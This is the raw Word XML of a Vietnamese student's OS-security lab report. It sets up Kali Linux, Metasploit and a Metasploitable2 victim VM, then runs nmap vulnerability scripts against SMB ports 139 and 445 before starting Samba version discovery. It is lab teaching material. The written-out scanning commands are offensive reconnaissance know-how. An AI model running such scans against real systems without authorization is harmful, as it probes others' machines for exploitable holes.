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4B0A" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="000551DB" w:rsidRPr="000551DB" w:rsidSect="000551DB">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="580" w:right="1340" w:bottom="280" w:left="1340" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D00D993" w14:textId="5E16D68C" w:rsidR="00F22637" w:rsidRPr="00F22637" w:rsidRDefault="00F22637" w:rsidP="00F22637">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">An toàn HĐH (INT1484) - Bài thực hành số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7DD21" w14:textId="77777777" w:rsidR="00F22637" w:rsidRDefault="00F22637" w:rsidP="00F22637">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Đinh Quang Hiếu – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B19DCAT065</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68152B" w14:textId="77777777" w:rsidR="00F22637" w:rsidRDefault="00F22637" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1F92B3" w14:textId="6FEDB5E5" w:rsidR="000551DB" w:rsidRPr="005E1BEE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Nội dung thực hành </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084BD597" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.1 Cài đặt các công cụ, nền tảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DBF4C" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="005B2CD4" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2CD4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy ảo (hoặc máy thực)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B09E5A" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2CD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D118047" wp14:editId="4372D253">
            <wp:extent cx="5731510" cy="275018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113" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1510D93B" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="005B2CD4" w:rsidRDefault="000551DB" w:rsidP="000551DB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5B2CD4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Đổi tên máy Kali Linux thành dạng Mã SV-Tên-Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A702B" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085E0342" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A172FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26FB8C47" wp14:editId="1B413645">
            <wp:extent cx="5731510" cy="264096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218" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EA1F28" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB9E9FF" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00A172FA" w:rsidRDefault="000551DB" w:rsidP="000551DB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r w:rsidRPr="00A172FA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra và chạy thử bộ công cụ tấn công MetaSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3052926A" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC7AE84" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A172FA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FCBAA91" wp14:editId="335B4AAD">
            <wp:extent cx="5731510" cy="399986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F22" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00A172FA" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680E7485" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00400ADF" w:rsidRDefault="000551DB" w:rsidP="000551DB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r w:rsidRPr="00A172FA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tải và cài đặt Metasploitable2 làm máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9902DD" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420F8504" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00400ADF" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400ADF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504CAC0F" wp14:editId="287193CB">
            <wp:extent cx="5731510" cy="28549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D526" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00A172FA" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF405D1" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00400ADF" w:rsidRDefault="000551DB" w:rsidP="000551DB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r w:rsidRPr="00400ADF">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo một người dùng mới trên máy ảo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72901C28" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9526D7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00400ADF" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002857CF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83F8C25" wp14:editId="28F0202A">
            <wp:extent cx="5731510" cy="367538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C6C4" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="002857CF" w:rsidRDefault="000551DB" w:rsidP="000551DB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r w:rsidRPr="00400ADF">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879440A" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3410C5" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F0EB1FE" wp14:editId="11CF22BC">
            <wp:extent cx="5731510" cy="303720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26F0" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4206A911" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1490CFE3" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128401B9" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="006F0699" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tìm địa chỉ IP của máy victim, kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42C9E8" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648AFDC" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="008F0B9C" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C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2744862" wp14:editId="5209B962">
            <wp:extent cx="5502117" cy="3962743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5807" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="006F0699" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F30B480" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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ictim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A894F91" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="006F0699" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BE48F0" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A19C003" wp14:editId="28E82402">
            <wp:extent cx="5731510" cy="337121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022B" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BD0382" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123C94E8" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="008F0B9C" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra kết nối mạng giữa các máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929335E" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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Kali đến Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA461A1" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49425E71" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CBA304C" wp14:editId="3DDBD011">
            <wp:extent cx="4458086" cy="2362405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FC2" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EDCCA1" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CFE3FA" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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ictim đến Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69BD19" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6688224D" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34C9EAC7" wp14:editId="41409C86">
            <wp:extent cx="5464013" cy="2217612"/>
            <wp:effectExtent l="0" t="0" r="381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2FC" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727CFD4F" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400EAFA4" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="008F0B9C" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng công cụ nmap để rà quét các lỗ hổng tồn tại trên máy chạy Metasploitable2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E750ECF" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Quét cổng dịch vụ netbios-ssn cổng 139: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap --script vuln -p139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;IP máy đích&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5C1B7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA54AE5" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54C50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6C19E6A" wp14:editId="2CE72B44">
            <wp:extent cx="4434840" cy="288264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284" cy="29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C9F" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448639E7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54C50">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Quét cổng dịch vụ microsoft-ds cổng 445: nmap --script vuln -p445</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;IP máy đích&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C681A19" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00A54C50" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6DF7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B73929D" wp14:editId="5BCC72BE">
            <wp:extent cx="4252328" cy="271295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2059" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EBEC7E" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDC88D9" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45724">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.3 Khai thác tìm phiên bản Samba đang hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307AB5F7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA382FE" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
